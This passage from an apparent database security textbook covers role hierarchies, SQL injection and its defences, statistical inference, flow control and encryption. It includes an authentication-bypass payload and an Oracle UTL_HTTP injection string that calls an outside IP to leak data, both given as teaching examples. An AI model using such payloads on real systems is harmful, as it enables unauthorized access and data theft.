exclusion, two roles that have been specified as mutually exclusive cannot be part of a user’s
authorization at the same time. In runtime exclusion, both these roles can be authorized to one
user but cannot be activated by the user at the same time. Another variation in mutual exclusion
of roles is that of complete and partial exclusion.
The role hierarchy in RBAC is a natural way to organize roles to reflect the
organization’s lines of authority and responsibility. By convention, junior roles at the bottom are connected to progressively senior roles as one moves up the hierarchy. The hierarchic
diagrams are partial orders, so they are reflexive, transitive, and antisymmetric. In other words,
if a user has one role, the user automatically has roles lower in the hierarchy. Defining a role
hierarchy involves choosing the type of hierarchy and the roles, and then implementing the
hierarchy by granting roles to other roles. Role hierarchy can be implemented in the following manner: a junior role is granted to the senior role above it, for example
GRANT engineer TO engineering_manager;
so that the senior role automatically holds all the privileges of the junior role (the role names here are only illustrative).
14.4. SQL INJECTION
In an SQL injection attack, the attacker injects a string input through the application,
which changes or manipulates the SQL statement to the attacker’s advantage. An SQL injection
attack can harm the database in various ways, such as unauthorized manipulation of the database
or retrieval of sensitive data. It can also be used to execute system-level commands that may
cause the system to deny service to the application.
SQL Manipulation:
A manipulation attack, which is the most common type of injection attack, changes an
SQL command in the application—for example, by adding conditions to the WHERE-clause of
a query, or by expanding a query with additional query components using set operations such
as UNION, INTERSECT, or MINUS. Other types of manipulation attacks are also possible.
For example, suppose that a simplistic authentication procedure issues the following query and
checks to see if any rows were returned:
SELECT * FROM users WHERE username = ‘jake’ and PASSWORD = ‘jakespasswd’;
The attacker can try to change (or manipulate) the SQL statement by changing it as follows:
SELECT * FROM users WHERE username = ‘jake’ and (PASSWORD =‘jakespasswd’ or ‘x’
= ‘x’);
As a result, the attacker who knows that ‘jake’ is a valid login of some user is able to
log into the database system as ‘jake’ without knowing his password and is able to do everything
that ‘jake’ may be authorized to do to the database system.
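The attack works because the application assembles the SQL string by concatenating raw user input. The following sketch (hypothetical application code, shown only to illustrate the flaw) reproduces the manipulated statement above:

# Vulnerable query construction: the password value is concatenated directly into
# the SQL text, so the attacker-supplied input rewrites the WHERE clause.
username = "jake"
password = "jakespasswd' or 'x' = 'x"    # attacker-controlled input

query = ("SELECT * FROM users WHERE username = '" + username +
         "' and PASSWORD = '" + password + "'")
print(query)
# SELECT * FROM users WHERE username = 'jake' and PASSWORD = 'jakespasswd' or 'x' = 'x'
# The trailing 'x' = 'x' condition is always true, so rows are returned
# even though the real password was never supplied.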
Code Injection:
This type of attack attempts to add additional SQL statements or commands to the
existing SQL statement by exploiting a computer bug, which is caused by processing invalid
data. The attacker can inject or introduce code into a computer program to change the course of
execution. Code injection is a popular technique for system hacking or cracking to gain
information.
Function Call Injection:
In this kind of attack, a database function or operating system function call is inserted
into a vulnerable SQL statement to manipulate the data or make a privileged system call. For
example, it is possible to exploit a function that performs some aspect related to network
communication. In addition, functions that are contained in a customized database package, or
any custom database function, can be executed as part of an SQL query. For example, the dual
table is used in the FROM clause of SQL in Oracle when a user needs to run SQL that does not
logically have a table name. To get today’s date, we can use:
SELECT SYSDATE FROM dual;
The following example demonstrates that even the simplest SQL statements can be vulnerable. Consider a statement of the form:
SELECT TRANSLATE (‘user input’, ‘from_string’, ‘to_string’) FROM dual;
This type of SQL statement can be subjected to a function injection attack. Consider the following example:
SELECT TRANSLATE (“ || UTL_HTTP.REQUEST(‘http://129.107.2.1/’) || ”,‘98765432’,
‘9876’) FROM dual;
The user can input the string (“ || UTL_HTTP.REQUEST (‘http://129.107.2.1/’) ||”),
where || is the concatenate operator, thus requesting a page from a Web server. UTL_HTTP
makes Hypertext Transfer Protocol (HTTP) callouts from SQL. The REQUEST object takes a
URL (‘http://129.107.2.1/’ in this example) as a parameter, contacts that site, and returns the
data (typically HTML) obtained from that site. The attacker could manipulate the string he
inputs, as well as the URL, to include other functions and do other illegal operations. We just
used a dummy example to show conversion of ‘98765432’ to ‘9876’, but the user’s intent would
be to access the URL and get sensitive information. The attacker can then retrieve useful
information from the database server—located at the URL that is passed as a parameter—and
send it to the Web server.
14.4.2. Risks Associated with SQL Injection
SQL injection is harmful and the risks associated with it provide motivation for
attackers. Some of the risks associated with SQL injection attacks are:
• Database fingerprinting: The attacker can determine the type of database being used in
the backend so that he can use database-specific attacks that correspond to weaknesses
in a particular DBMS.
• Denial of service: The attacker can flood the server with requests, thus denying service
to valid users, or the attacker can delete some data.
• Bypassing authentication: This is one of the most common risks, in which the attacker
can gain access to the database as an authorized user and perform all the desired tasks.
• Identifying injectable parameters: In this type of attack, the attacker gathers important
information about the type and structure of the back-end database of a Web application.
This attack is made possible by the fact that the default error page returned by
application servers is often overly descriptive.
• Executing remote commands: This provides attackers with a tool to execute arbitrary
commands on the database. For example, a remote user can execute stored database
procedures and functions from a remote SQL interactive interface.
• Performing privilege escalation: This type of attack takes advantage of logical flaws
within the database to upgrade the access level.
14.4.3. Protection Techniques against SQL Injection
Protection against SQL injection attacks can be achieved by applying certain
programming rules to all Web-accessible procedures and functions. This section describes some
of these techniques.
Bind Variables (Using Parameterized Statements): The use of bind variables protects against
injection attacks and also improves performance.
Consider the following example using Java and JDBC:
PreparedStatement stmt = conn.prepareStatement( “SELECT * FROM
EMPLOYEE WHERE EMPLOYEE_ID=? AND PASSWORD=?”);
stmt.setString(1, employee_id);
stmt.setString(2, password);
Instead of embedding the user input into the statement string, the input should be bound to a parameter. In this example, the first placeholder (?) is bound to the variable employee_id and the second to password, instead of directly concatenating the user-supplied strings into the query text.
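The same protection is available in most languages and drivers. For example, the following Python sketch (using the standard sqlite3 module purely for illustration) binds the inputs to placeholders, so the injection attempt is treated as ordinary data:

# Parameterized-statement sketch: the SQL text and the parameter values are sent
# separately, so user input cannot change the structure of the statement.
import sqlite3

conn = sqlite3.connect(":memory:")     # illustrative in-memory database
conn.execute("CREATE TABLE EMPLOYEE (EMPLOYEE_ID TEXT, PASSWORD TEXT)")
conn.execute("INSERT INTO EMPLOYEE VALUES ('1', 'secret')")

employee_id = "1"
password = "secret' OR 'x' = 'x"       # injection attempt, now treated as plain data
rows = conn.execute(
    "SELECT * FROM EMPLOYEE WHERE EMPLOYEE_ID = ? AND PASSWORD = ?",
    (employee_id, password),
).fetchall()
print(rows)                            # [] -- the manipulation does not succeed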
Filtering Input (Input Validation):
This technique can be used to remove escape characters from input strings by using the
SQL Replace function. For example, the delimiter single quote (‘) can be replaced by two single
quotes (‘’).
Function Security:
Database functions, both standard and custom, should be restricted, as they can be
exploited in the SQL function injection attacks.
Statistical databases are used mainly to produce statistics about various populations. The
database may contain confidential data about individuals; this information should be protected
from user access. However, users are permitted to retrieve statistical information about the
populations, such as averages, sums, counts, maximums, minimums, and standard deviations.
Example: Let us consider PERSON relation with the attributes Name, Ssn, Income, Address,
City, State, Zip, Sex, and Last_degree for illustrating statistical database security.
A population is a set of tuples of a relation (table) that satisfy some selection condition.
Hence, each selection condition on the PERSON relation will specify a particular population of
PERSON tuples. For example, the condition Sex = ‘M’ specifies the male population; the
condition ((Sex = ‘F’) AND (Last_degree = ‘M.S.’ OR Last_degree = ‘Ph.D.’)) specifies the
female population that has an M.S. or Ph.D. degree as their highest degree; and the condition
City = ‘Houston’ specifies the population that lives in Houston.
However, statistical users are not allowed to retrieve individual data, such as the income
of a specific person. Statistical database security techniques must prohibit the retrieval of
individual data. This can be achieved by prohibiting queries that retrieve attribute values and
by allowing only queries that involve statistical aggregate functions such as COUNT, SUM,
MIN, MAX, AVERAGE, and STANDARD DEVIATION. Such queries are sometimes called
statistical queries.
In some cases, it is possible to infer the values of individual tuples from a sequence of
statistical queries. This is particularly true when the conditions result in a population consisting
of a small number of tuples. As an illustration, consider the following statistical queries:
Q1: SELECT COUNT (*) FROM PERSON WHERE <condition>;
Q2: SELECT AVG (Income) FROM PERSON WHERE <condition>;
Now suppose that we are interested in finding the Income of Jane Smith, and we know that she has a Ph.D. degree and that she lives in the city of Bellaire, Texas. We issue the statistical query Q1 with the following condition:
(Last_degree = ‘Ph.D.’ AND City = ‘Bellaire’ AND State = ‘Texas’)
If we get a result of 1 for this query, we can issue Q2 with the same condition and find the Income of Jane Smith. Even if the result of Q1 on the preceding condition is not 1 but is a small number, say 2 or 3, we can issue statistical queries using the functions MAX, MIN, and AVERAGE to identify the possible range of values for the Income of Jane Smith.
• One protection technique is to prohibit statistical queries whenever the number of tuples in the population specified by the selection condition falls below a minimum threshold, since very small populations make such inference easy (a sketch of this idea appears after this list).
• Another technique is partitioning of the database. Partitioning implies that records are stored in groups of some minimum size; queries can refer to any complete group or set of groups, but never to subsets of records within a group.
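A minimal sketch of rejecting statistical queries over very small populations is given below (the threshold and data are illustrative only, not a complete protection mechanism):

# Sketch: a statistical query interface that refuses to answer when the selected
# population is smaller than a minimum threshold, to limit inference of individual values.
MIN_POPULATION = 10        # illustrative threshold

people = [
    {"Name": "Jane Smith", "City": "Bellaire", "Last_degree": "Ph.D.", "Income": 90000},
    {"Name": "Another Person", "City": "Houston", "Last_degree": "M.S.", "Income": 70000},
    # ... more PERSON tuples ...
]

def avg_income(condition):
    population = [p for p in people if condition(p)]
    if len(population) < MIN_POPULATION:
        raise PermissionError("population too small; statistical query rejected")
    return sum(p["Income"] for p in population) / len(population)

try:
    # This narrow condition would identify a single person, so it is rejected.
    avg_income(lambda p: p["Last_degree"] == "Ph.D." and p["City"] == "Bellaire")
except PermissionError as err:
    print(err)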
Flow control regulates the distribution or flow of information among accessible objects.
A flow between object X and object Y occurs when a program reads values from X and writes
values into Y. Flow controls check that information contained in some objects does not flow
explicitly or implicitly into less protected objects. Thus, a user cannot get indirectly in Y what
he or she cannot get directly in X. Most flow controls employ some concept of security class;
the transfer of information from a sender to a receiver is allowed only if the receiver’s security
class is at least as privileged as the sender’s security class. Example: Preventing a service
program from leaking a customer’s confidential data, and blocking the transmission of secret
military data to an unknown classified user.
A flow policy specifies the channels along which information is allowed to move. The
simplest flow policy specifies just two classes of information—confidential (C) and
nonconfidential (N)—and allows all flows except those from class C to class N. This policy can
solve the confinement problem that arises when a service program handles data such as
customer information, some of which may be confidential. For example, an income-tax-
computing service might be allowed to retain a customer’s address and the bill for services
rendered, but not a customer’s income or deductions.
Two types of flow can be distinguished: explicit flows, which occur as a consequence of assignment instructions, such as Y := f(X1, …, Xn); and implicit flows, which are generated by conditional instructions, such as if f(Xm+1, …, Xn) then Y := f(X1, …, Xm).
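The flow rule (information may move only to an object whose security class is at least as privileged as the source's class) can be sketched for the two-class policy as follows; the class assignments are illustrative:

# Flow control sketch for the two-class policy: flows from confidential (C)
# objects to nonconfidential (N) objects are rejected; all other flows are allowed.
LEVEL = {"N": 0, "C": 1}      # nonconfidential is less privileged than confidential

object_class = {
    "customer_income": "C",
    "customer_address": "N",
    "service_bill": "N",
}

def allow_flow(source_obj, target_obj):
    # allowed only if the target's class is at least as privileged as the source's
    return LEVEL[object_class[target_obj]] >= LEVEL[object_class[source_obj]]

print(allow_flow("customer_address", "service_bill"))   # True  (N -> N)
print(allow_flow("customer_income", "service_bill"))    # False (C -> N is blocked)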
Encryption is the conversion of data into a form, called ciphertext, that cannot be easily understood by unauthorized persons. It enhances security and privacy when access controls are
bypassed, because in cases of data loss or theft, encrypted data cannot be easily understood by
unauthorized persons. Some of the standard definitions are listed below:
• Plaintext (or cleartext): Intelligible data that has meaning and can be read or acted upon without the application of decryption.
• Ciphertext: Encrypted (enciphered) data that cannot be read without decryption.
A symmetric key is one key that is used for both encryption and decryption. By using a
symmetric key, fast encryption and decryption is possible for routine use with sensitive data in
the database. A message encrypted with a secret key can be decrypted only with the same secret
key. Algorithms used for symmetric key encryption are called secret key algorithms. Since
secret-key algorithms are mostly used for encrypting the content of a message, they are also
called content-encryption algorithms.
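As a simple illustration (a sketch assuming the third-party cryptography package, not a recommendation of a specific product), symmetric encryption of a sensitive value uses one secret key for both operations:

# Symmetric-key sketch: the same secret key encrypts and decrypts the data.
# Assumes the third-party "cryptography" package (pip install cryptography).
from cryptography.fernet import Fernet

secret_key = Fernet.generate_key()      # the shared secret key
cipher = Fernet(secret_key)

ciphertext = cipher.encrypt(b"Income: 90000")   # store or transmit the ciphertext
print(cipher.decrypt(ciphertext))               # only the same key recovers the plaintext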
Public key algorithms are based on mathematical functions rather than operations on bit
patterns. They address one drawback of symmetric key encryption, namely that both sender and
recipient must exchange the common key in a secure manner. In public key systems, two keys
are used for encryption/decryption. The public key can be transmitted in a nonsecure way,
whereas the private key is not transmitted at all. These algorithms—which use two related keys,
a public key and a private key, to perform complementary operations (encryption and
decryption)—are known as asymmetric key encryption algorithms. The two keys used for
public key encryption are referred to as the public key and the private key. The private key is
kept secret, but it is referred to as a private key rather than a secret key (the key used in
conventional encryption) to avoid confusion with conventional encryption.
A public key encryption scheme has the following ingredients:
1. Plaintext. This is the data or readable message that is fed into the algorithm as input.
2. Encryption algorithm. This algorithm performs various transformations on the plaintext.
3. Public and private keys. These are a pair of keys that have been selected so that if one is used for encryption, the other is used for decryption. The exact transformations performed by the encryption algorithm depend on the public or private key that is provided as input. For example, if a message is encrypted using the public key, it can only be decrypted using the private key.
4. Ciphertext. This is the scrambled message produced as output. It depends on the plaintext and the key.
5. Decryption algorithm. This algorithm accepts the ciphertext and the matching key and produces the original plaintext.
The essential steps of public key encryption are as follows:
1. Each user generates a pair of keys to be used for the encryption and decryption of
messages.
2. Each user places one of the two keys in a public register or other accessible file. This is
the public key. The companion key is kept private.
3. If a sender wishes to send a private message to a receiver, the sender encrypts the
message using the receiver’s public key.
4. When the receiver receives the message, he or she decrypts it using the receiver’s private
key. No other recipient can decrypt the message because only the receiver knows his or
her private key.
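These steps can be traced with a toy RSA-style example using deliberately tiny, insecure numbers (for illustration only); the public key is the pair (e, n) and the private key is (d, n):

# Toy public-key sketch (RSA-style) with insecure, tiny numbers.
p, q = 61, 53
n = p * q                    # 3233, shared by both keys
phi = (p - 1) * (q - 1)      # 3120
e = 17                       # public exponent, chosen coprime with phi
d = pow(e, -1, phi)          # private exponent 2753, since (e * d) % phi == 1  (Python 3.8+)

message = 65                             # plaintext represented as a number
ciphertext = pow(message, e, n)          # sender encrypts with the receiver's public key
recovered = pow(ciphertext, d, n)        # receiver decrypts with the private key
print(ciphertext, recovered)             # 2790 65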
Considering the vast growth in volume and speed of threats to databases and information
assets, research efforts need to be devoted to a number of issues: data quality, intellectual
property rights, and database survivability.
Data Quality:
The database community needs techniques and organizational solutions to assess and
attest to the quality of data. These techniques may include simple mechanisms such as quality
stamps that are posted on Web sites. We also need techniques that provide more effective
integrity semantics verification and tools for the assessment of data quality, based on techniques
such as record linkage. Application-level recovery techniques are also needed for automatically
repairing incorrect data.
Intellectual Property Rights:
With the widespread use of the Internet and intranets, legal and informational aspects of
data are becoming major concerns for organizations. To address these concerns, watermarking
techniques for relational data have been proposed. Digital watermarking has traditionally relied
upon the availability of a large noise domain within which the object can be altered while
retaining its essential properties. However, research is needed to assess the robustness of such
techniques and to investigate different approaches aimed at preventing intellectual property
rights violations.
Database Survivability:
Database systems need to operate and continue their functions, even with reduced
capabilities, despite disruptive events such as information warfare attacks. A DBMS, in addition
to making every effort to prevent an attack and detecting one in the event of occurrence, should
be able to do the following:
• Confinement: Take immediate action to eliminate the attacker’s access to the system
and to isolate or contain the problem to prevent further spread.
• Damage assessment: Determine the extent of the problem, including failed functions
and corrupted data.
• Reconfiguration: Reconfigure to allow operation to continue in a degraded mode while
recovery proceeds.
• Repair: Recover corrupted or lost data and repair or reinstall failed system functions to
reestablish a normal level of operation.
• Fault treatment: To the extent possible, identify the weaknesses exploited in the attack
and take steps to prevent a recurrence.
The specific target of an attack may be the system itself or its data. Although attacks
that bring the system down outright are severe and dramatic, they must also be well timed to
achieve the attacker’s goal, since attacks will receive immediate and concentrated attention in
order to bring the system back to operational condition, diagnose how the attack took place, and
install preventive measures.